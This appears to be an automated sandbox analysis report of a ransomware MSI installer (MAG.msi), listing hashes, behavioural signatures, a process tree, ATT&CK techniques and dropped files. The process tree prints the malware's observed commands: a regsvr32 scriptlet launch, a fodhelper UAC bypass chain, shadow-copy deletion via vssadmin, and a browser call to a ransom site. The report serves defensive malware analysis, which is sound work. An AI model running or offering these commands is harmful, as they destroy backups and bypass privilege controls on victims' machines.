Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    23-05-2022 05:17

General

  • Target

    MAG.msi

  • Size

    96KB

  • MD5

    957d0c81c985609c580565a0323a14cd

  • SHA1

    d8d46413409a14a1ae407107016e28074c6824d5

  • SHA256

    9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be

  • SHA512

    0ff024ff07ab13e7d308429fd8906560e58610b63a7dd468f6b5b6c86221962dbc27e93090e5607104201e9cabe90b52affba54411a541f5c2f5369db231cf52

Malware Config

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 2 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies registry class 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2384
    • C:\Windows\system32\regsvr32.exe
      regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
      2⤵
      • Modifies registry class
      PID:1144
    • C:\Windows\system32\cmd.exe
      cmd /c "start fodhelper.exe"
      2⤵
        PID:60
        • C:\Windows\system32\fodhelper.exe
          fodhelper.exe
          3⤵
            PID:408
            • C:\Windows\system32\regsvr32.exe
              "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
              4⤵
                PID:3764
                • C:\Windows\System32\vssadmin.exe
                  "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                  5⤵
                  • Interacts with shadow copies
                  PID:2332
          • C:\Windows\system32\cmd.exe
            cmd /c "start fodhelper.exe"
            2⤵
              PID:1896
              • C:\Windows\system32\fodhelper.exe
                fodhelper.exe
                3⤵
                  PID:3156
                  • C:\Windows\system32\regsvr32.exe
                    "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
                    4⤵
                      PID:1080
                      • C:\Windows\System32\vssadmin.exe
                        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                        5⤵
                        • Interacts with shadow copies
                        PID:2620
              • C:\Windows\system32\taskhostw.exe
                taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:2492
                • C:\Windows\system32\regsvr32.exe
                  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
                  2⤵
                  • Modifies registry class
                  PID:1156
                • C:\Windows\system32\cmd.exe
                  cmd /c "start fodhelper.exe"
                  2⤵
                    PID:688
                    • C:\Windows\system32\fodhelper.exe
                      fodhelper.exe
                      3⤵
                        PID:3188
                        • C:\Windows\system32\regsvr32.exe
                          "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
                          4⤵
                            PID:4352
                            • C:\Windows\System32\vssadmin.exe
                              "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                              5⤵
                              • Interacts with shadow copies
                              PID:1268
                      • C:\Windows\system32\cmd.exe
                        cmd /c "start fodhelper.exe"
                        2⤵
                          PID:1156
                          • C:\Windows\system32\fodhelper.exe
                            fodhelper.exe
                            3⤵
                              PID:1932
                              • C:\Windows\system32\regsvr32.exe
                                "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
                                4⤵
                                  PID:1268
                                  • C:\Windows\System32\vssadmin.exe
                                    "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                                    5⤵
                                    • Interacts with shadow copies
                                    PID:2140
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2396
                            • C:\Windows\system32\regsvr32.exe
                              regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/rtuvkf9dn
                              2⤵
                              • Modifies registry class
                              PID:944
                            • C:\Windows\system32\cmd.exe
                              cmd /c "start fodhelper.exe"
                              2⤵
                                PID:4852
                                • C:\Windows\system32\fodhelper.exe
                                  fodhelper.exe
                                  3⤵
                                    PID:3580
                                    • C:\Windows\system32\regsvr32.exe
                                      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
                                      4⤵
                                        PID:2148
                                        • C:\Windows\System32\vssadmin.exe
                                          "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                                          5⤵
                                          • Interacts with shadow copies
                                          PID:964
                                  • C:\Windows\system32\cmd.exe
                                    cmd /c "start fodhelper.exe"
                                    2⤵
                                      PID:2840
                                      • C:\Windows\system32\fodhelper.exe
                                        fodhelper.exe
                                        3⤵
                                          PID:4196
                                          • C:\Windows\system32\regsvr32.exe
                                            "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb
                                            4⤵
                                              PID:1488
                                              • C:\Windows\System32\vssadmin.exe
                                                "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
                                                5⤵
                                                • Interacts with shadow copies
                                                PID:60
                                      • C:\Windows\system32\msiexec.exe
                                        msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\MAG.msi
                                        1⤵
                                        • Enumerates connected drives
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of FindShellTrayWindow
                                        PID:5104
                                      • C:\Windows\system32\msiexec.exe
                                        C:\Windows\system32\msiexec.exe /V
                                        1⤵
                                        • Enumerates connected drives
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:4532
                                        • C:\Windows\system32\srtasks.exe
                                          C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                          2⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:548
                                        • C:\Windows\System32\MsiExec.exe
                                          C:\Windows\System32\MsiExec.exe -Embedding 05BCD37A0E5588B5EF7FD2ED87E41176
                                          2⤵
                                          • Modifies extensions of user files
                                          • Loads dropped DLL
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious behavior: MapViewOfSection
                                          • Suspicious use of WriteProcessMemory
                                          PID:1312
                                          • C:\Windows\System32\cmd.exe
                                            cmd /c "start microsoft-edge:http://fa480838f6meemybio.cryless.info/meemybio^&1^&43548853^&81^&417^&2219041
                                            3⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:2628
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://fa480838f6meemybio.cryless.info/meemybio&1&43548853&81&417&2219041
                                              4⤵
                                              • Adds Run key to start application
                                              • Enumerates system info in registry
                                              • Modifies registry class
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of WriteProcessMemory
                                              PID:1440
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9211946f8,0x7ff921194708,0x7ff921194718
                                                5⤵
                                                  PID:3704
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
                                                  5⤵
                                                    PID:4548
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
                                                    5⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:8
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3204 /prefetch:8
                                                    5⤵
                                                      PID:860
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:1
                                                      5⤵
                                                        PID:4252
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1
                                                        5⤵
                                                          PID:620
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
                                                          5⤵
                                                            PID:4380
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5184 /prefetch:8
                                                            5⤵
                                                              PID:628
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5512 /prefetch:8
                                                              5⤵
                                                                PID:1156
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
                                                                5⤵
                                                                  PID:2652
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
                                                                  5⤵
                                                                    PID:428
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
                                                                    5⤵
                                                                      PID:344
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                                                      5⤵
                                                                      • Drops file in Program Files directory
                                                                      PID:2220
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff7f23c5460,0x7ff7f23c5470,0x7ff7f23c5480
                                                                        6⤵
                                                                          PID:3736
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
                                                                        5⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:2768
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2160,1277305586607036726,7478532024044843935,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3596 /prefetch:8
                                                                        5⤵
                                                                          PID:808
                                                                • C:\Windows\system32\vssvc.exe
                                                                  C:\Windows\system32\vssvc.exe
                                                                  1⤵
                                                                  • Checks SCSI registry key(s)
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2392
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
                                                                  1⤵
                                                                  • Checks SCSI registry key(s)
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:1272
                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                  1⤵
                                                                    PID:2332
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                    1⤵
                                                                      PID:3132

                                                                    Network

                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                    Persistence

                                                                    Registry Run Keys / Startup Folder

                                                                    1
                                                                    T1060

                                                                    Defense Evasion

                                                                    File Deletion

                                                                    2
                                                                    T1107

                                                                    Modify Registry

                                                                    1
                                                                    T1112

                                                                    Discovery

                                                                    Query Registry

                                                                    3
                                                                    T1012

                                                                    Peripheral Device Discovery

                                                                    2
                                                                    T1120

                                                                    System Information Discovery

                                                                    4
                                                                    T1082

                                                                    Impact

                                                                    Inhibit System Recovery

                                                                    2
                                                                    T1490

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Users\Public\glvt6878zb
                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      fe4a708f201a02075821a3adfbf46722

                                                                      SHA1

                                                                      0043a0976efb85b573fa959f7db59ff3ea751561

                                                                      SHA256

                                                                      e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893

                                                                      SHA512

                                                                      cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a

                                                                    • C:\Users\Public\glvt6878zb
                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      fe4a708f201a02075821a3adfbf46722

                                                                      SHA1

                                                                      0043a0976efb85b573fa959f7db59ff3ea751561

                                                                      SHA256

                                                                      e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893

                                                                      SHA512

                                                                      cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a

                                                                    • C:\Users\Public\glvt6878zb
                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      fe4a708f201a02075821a3adfbf46722

                                                                      SHA1

                                                                      0043a0976efb85b573fa959f7db59ff3ea751561

                                                                      SHA256

                                                                      e9abfc3edda27e0f5f0ce7714c8970ef7ab1408ec90db605500c3ef1130f4893

                                                                      SHA512

                                                                      cd470d22741cc6913f6ad8a2aee53073d7ba8a90d1adb6feece3ec38a29248c63e77c0b156cb4fe24ca1895c116148de6f4d738ec56b24d2db0b6c5d33d1f87a

                                                                    • C:\Users\Public\rtuvkf9dn
                                                                      Filesize

                                                                      3KB

                                                                      MD5

                                                                      9287a7c05440f4fba02ddc00bbc0d2dc

                                                                      SHA1

                                                                      d6d4fd6acec6367ab60e52025090c95b03470812

                                                                      SHA256

                                                                      27c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2

                                                                      SHA512

                                                                      522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae

                                                                    • C:\Users\Public\rtuvkf9dn
                                                                      Filesize

                                                                      3KB

                                                                      MD5

                                                                      9287a7c05440f4fba02ddc00bbc0d2dc

                                                                      SHA1

                                                                      d6d4fd6acec6367ab60e52025090c95b03470812

                                                                      SHA256

                                                                      27c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2

                                                                      SHA512

                                                                      522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae

                                                                    • C:\Users\Public\rtuvkf9dn
                                                                      Filesize

                                                                      3KB

                                                                      MD5

                                                                      9287a7c05440f4fba02ddc00bbc0d2dc

                                                                      SHA1

                                                                      d6d4fd6acec6367ab60e52025090c95b03470812

                                                                      SHA256

                                                                      27c670a5554474ec71f3bd734787d626685e6df1e49a34d94588ee020a25efb2

                                                                      SHA512

                                                                      522da9172415787757f13ec50a0f67763c0bd0addf09a62621d74c3fcc4cbf702b283d9c19f195eb130f1647f096b046e25d62e93f584bbe9e471cd5b11d1aae

                                                                    • C:\Windows\Installer\MSIBDB2.tmp
                                                                      Filesize

                                                                      52KB

                                                                      MD5

                                                                      d6959db7ef3dd8a1d7576dc07b58ac20

                                                                      SHA1

                                                                      5d61f82d962bca473eb499a97dd8bd2b0c89787d

                                                                      SHA256

                                                                      e04d0b1a3abde3e3294736ca90fb39121b7c36015e812fa903e1050dc93a2d6c

                                                                      SHA512

                                                                      e0d47ab5b67b0c0e0a5657fedf1827e6ef7e9e81bcc85afd406da1bb84a7f62b383da799f3dd864468c7ed8746731c1984ec281cd3b23396cb34eb61da5fadc1

                                                                    • C:\Windows\Installer\MSIBDB2.tmp
                                                                      Filesize

                                                                      52KB

                                                                      MD5

                                                                      d6959db7ef3dd8a1d7576dc07b58ac20

                                                                      SHA1

                                                                      5d61f82d962bca473eb499a97dd8bd2b0c89787d

                                                                      SHA256

                                                                      e04d0b1a3abde3e3294736ca90fb39121b7c36015e812fa903e1050dc93a2d6c

                                                                      SHA512

                                                                      e0d47ab5b67b0c0e0a5657fedf1827e6ef7e9e81bcc85afd406da1bb84a7f62b383da799f3dd864468c7ed8746731c1984ec281cd3b23396cb34eb61da5fadc1

                                                                    • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                                                      Filesize

                                                                      23.0MB

                                                                      MD5

                                                                      afc0194808d23b11be1a18aef9e10231

                                                                      SHA1

                                                                      14e204a1207e98a027ff36a6a69b11d5969682bc

                                                                      SHA256

                                                                      2a0de9dcf6962a0724ccb9be7c3bd4cb6243a23be6da9be68c5b4258008f528d

                                                                      SHA512

                                                                      18334fda61fef82440c4e65b813bd2fc1602c339632ca11118a30a749fc5be15f94aa3d7a1e16874bdaaf7dd7e9c4f462963939be16fbb86374f13f68ee4050a

                                                                    • \??\Volume{c8b84e5a-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{8a04187e-bddd-4be7-adb4-759449331aa1}_OnDiskSnapshotProp
                                                                      Filesize

                                                                      5KB

                                                                      MD5

                                                                      814f9267a3d558df0d00ffdbec7a4948

                                                                      SHA1

                                                                      00cf74bd8c222add8811962adb1da3994512475a

                                                                      SHA256

                                                                      e246fbed087412a7925a3d23feb8c2ee0e52a5541e669fcb942e1c9f43a963e5

                                                                      SHA512

                                                                      09e0fe6b11c55ec3a728600a224dfcaaf9d16a19c31a3c5fb87fec93d607f7dee33d1d5e1028a0f5d5c3662fff7e05efe4dfdb700249937244e0b67d7dd86587

                                                                    • \??\pipe\LOCAL\crashpad_1440_EMJPZEEFKKUVNQAE
                                                                      MD5

                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                      SHA1

                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                      SHA256

                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                      SHA512

                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                    • memory/8-151-0x0000000000000000-mapping.dmp
                                                                    • memory/60-195-0x0000000000000000-mapping.dmp
                                                                    • memory/60-164-0x0000000000000000-mapping.dmp
                                                                    • memory/408-167-0x0000000000000000-mapping.dmp
                                                                    • memory/428-181-0x0000000000000000-mapping.dmp
                                                                    • memory/548-130-0x0000000000000000-mapping.dmp
                                                                    • memory/620-158-0x0000000000000000-mapping.dmp
                                                                    • memory/628-162-0x0000000000000000-mapping.dmp
                                                                    • memory/688-163-0x0000000000000000-mapping.dmp
                                                                    • memory/808-198-0x0000000000000000-mapping.dmp
                                                                    • memory/860-154-0x0000000000000000-mapping.dmp
                                                                    • memory/944-138-0x0000000000000000-mapping.dmp
                                                                    • memory/964-175-0x0000000000000000-mapping.dmp
                                                                    • memory/1080-193-0x0000000000000000-mapping.dmp
                                                                    • memory/1144-139-0x0000000000000000-mapping.dmp
                                                                    • memory/1156-141-0x0000000000000000-mapping.dmp
                                                                    • memory/1156-185-0x0000000000000000-mapping.dmp
                                                                    • memory/1156-177-0x0000000000000000-mapping.dmp
                                                                    • memory/1268-174-0x0000000000000000-mapping.dmp
                                                                    • memory/1268-191-0x0000000000000000-mapping.dmp
                                                                    • memory/1312-131-0x0000000000000000-mapping.dmp
                                                                    • memory/1312-140-0x00000222F4DF0000-0x00000222F4DFC000-memory.dmp
                                                                      Filesize

                                                                      48KB

                                                                    • memory/1440-147-0x0000000000000000-mapping.dmp
                                                                    • memory/1488-192-0x0000000000000000-mapping.dmp
                                                                    • memory/1896-186-0x0000000000000000-mapping.dmp
                                                                    • memory/1932-188-0x0000000000000000-mapping.dmp
                                                                    • memory/2140-194-0x0000000000000000-mapping.dmp
                                                                    • memory/2148-170-0x0000000000000000-mapping.dmp
                                                                    • memory/2220-182-0x0000000000000000-mapping.dmp
                                                                    • memory/2332-173-0x0000000000000000-mapping.dmp
                                                                    • memory/2384-142-0x0000021BA90F0000-0x0000021BA90F3000-memory.dmp
                                                                      Filesize

                                                                      12KB

                                                                    • memory/2620-196-0x0000000000000000-mapping.dmp
                                                                    • memory/2628-144-0x0000000000000000-mapping.dmp
                                                                    • memory/2652-179-0x0000000000000000-mapping.dmp
                                                                    • memory/2768-184-0x0000000000000000-mapping.dmp
                                                                    • memory/2840-187-0x0000000000000000-mapping.dmp
                                                                    • memory/3156-189-0x0000000000000000-mapping.dmp
                                                                    • memory/3188-168-0x0000000000000000-mapping.dmp
                                                                    • memory/3580-166-0x0000000000000000-mapping.dmp
                                                                    • memory/3704-148-0x0000000000000000-mapping.dmp
                                                                    • memory/3736-183-0x0000000000000000-mapping.dmp
                                                                    • memory/3764-169-0x0000000000000000-mapping.dmp
                                                                    • memory/4196-190-0x0000000000000000-mapping.dmp
                                                                    • memory/4252-156-0x0000000000000000-mapping.dmp
                                                                    • memory/4352-171-0x0000000000000000-mapping.dmp
                                                                    • memory/4380-160-0x0000000000000000-mapping.dmp
                                                                    • memory/4548-150-0x0000000000000000-mapping.dmp
                                                                    • memory/4852-165-0x0000000000000000-mapping.dmp